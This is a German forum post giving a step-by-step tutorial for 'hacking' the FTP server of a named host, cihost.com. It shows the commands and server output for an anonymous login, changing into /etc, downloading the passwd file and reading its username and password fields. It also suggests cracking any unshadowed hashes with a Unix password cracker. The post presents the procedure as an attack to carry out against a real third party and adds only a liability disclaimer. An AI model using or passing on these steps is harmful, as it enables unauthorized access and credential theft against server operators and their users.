-
ftp hacken
Ich kenne schon ziemlich viele dieser Tutoriale doch viele gehen nicht richtig darauf
ich will euch in diesem Tutorial zeigen wie man den FTP Server von cihost.com knackt.
Ich übernehme keine Haftung für irgendwelche Schäden die dabei zusammenkommen!
Ok fangen wir an:
Als erstes geht einmal auf Start-->Ausführen dann gebt ein ftp und klickt auf OK
Nun seht ihr den Eingabeaufforderungsbildschirm wo nun aber FTP steht.
Connecten:
jetzt geben wir ein--> open www.cihost.com nach einem kurzen Verbindungsaufbau erhalten
wir die folgende Meldung-->
Verbindung mit www.cihost.com wurde hergestellt
220-
220-Welcome to cihost.com!
220-
220 www.cihost.com FTP server (Version wu-2.6.2(1) "Hier das heutige Datum">
ready.
Benutzer <www.cihost.com:-(none)):
Hinweis--> Für alle die jetzt Schiss haben weiterzumachen empfehle ich Flöte spielen zu
gehen!
Einloggen:
Ihr seht nun diese Zeile vor euch
Benutzer <www.cihost.com:-(none)):
in diese gebt ihr ein
Benutzer <www.cihost.com:-(none)): anonymous
dann drückt "Enter"
nun kommt folgende Meldung-->
331 Guest login ok, send your complete e-mail adress as password.
Kennwort:
Nun gebt eine beliebige E-Mail ein z.b. bill@suck.de
Fals ihr beobachtet das nichts geschrieben wird wundert euch nicht, es wird geschrieben
Nun kommt folgende meldung-->
230 Guest Login ok, access restrictions apply.
Inhalte anziegen lassen:
Was ihr nun als nächstes macht ist das ihr eingebt --> "dir"
dann erhaltet ihr folgende Meldung-->
200 PORt command succesful.
150 Opening ASCII mode data connection for /bin/ls
total 5544
-rw-r--r-- 1 525 525 "das heutige Datum" .banner
...........
...........
...........
...........
Und so weiter..
Schaut anch dieser Zeile -->
dr--xr-xr-x 2 0 0 4096 "Datum" !!!etc!!!
"etc" das ist er unser Ordner.
Ordner wechsel:
Nun geben wir ein--> cd etc
Dann erhalten wir folgende meldung-->
250 CWD command succesful.
gleich geben wir wieder --> "dir" ein und lassen uns die dateien auflisten.
Ihr seht die Zeilen
-rw-r--r-- 1 0 1 53 "Datum" group
-rw-r--r-- 1 0 1 79 "Datum" passwd
Ordner wählen:
Nun geben wir ein--> lcd
darauf hin kommt die Meldung-->
Lokales verzeichnis jetzt C:\....
Nun könnt ihr entscheiden in welchen Ordner die Passwd datei geladen werden soll.
Ich persönlich entscheide mich immer für --> lcd C:\
das ist C:\ Meine Festplatte.
Das Passwort grabben:
Nun geben wir ein --> get passwd
Dann erhalten wir die Meldung-->
200 PORt command succesful
150 Opening ASCII mode data connection for passwd (79 bytes).
226 Transfer complete.
FTP: 84 Bytes empfangen in 0,00 Sekunden 84000,00KB/s
Das bedeutet wir haben die "passwd" datei.
Nun geben wir schnell --> close ein um die Verbidnung zu beenden.
Passwort datei anschauen:
Wenn wir jetzt in unserem Ordner wo wir die "passwd" Datei hingeladen haben nachschauen
finden wir eine datei namens "passwd" vor.. wenn wir jetzt doppelklicken öffnet sich ein
Fenster das zeigt... Das die datei nicht geöffnet werden kann.. Bitte wählen sie ein
Programm zum öffnen.. Alles kein Problem wir nehmen einfach das Notepad (Editor)
Nun hat man die Pass-Datei vor sich. Die Zeichenfolgen vor dem ersten Doppelpunkt sind pro Zeile der Username,
hinter dem folgenden Doppelpunkt steht dann das Passwort. In diesem Fall sieht man hier nur
ein "*". Das heißt, dass hier die passwd-Datei leider shadowed ist, sich also von einem anonymen User nicht
anzeigen lässt. Bei anderen Pass-Files wäre hier evtl. ein verschlüsseltes Passwort, was sich dann mit einem
Unix-Passwort-Cracker ohne Probleme entschlüsseln ließe.
-
Stichworte
Berechtigungen
- Neue Themen erstellen: Nein
- Themen beantworten: Nein
- Anhänge hochladen: Nein
- Beiträge bearbeiten: Nein
-
Foren-Regeln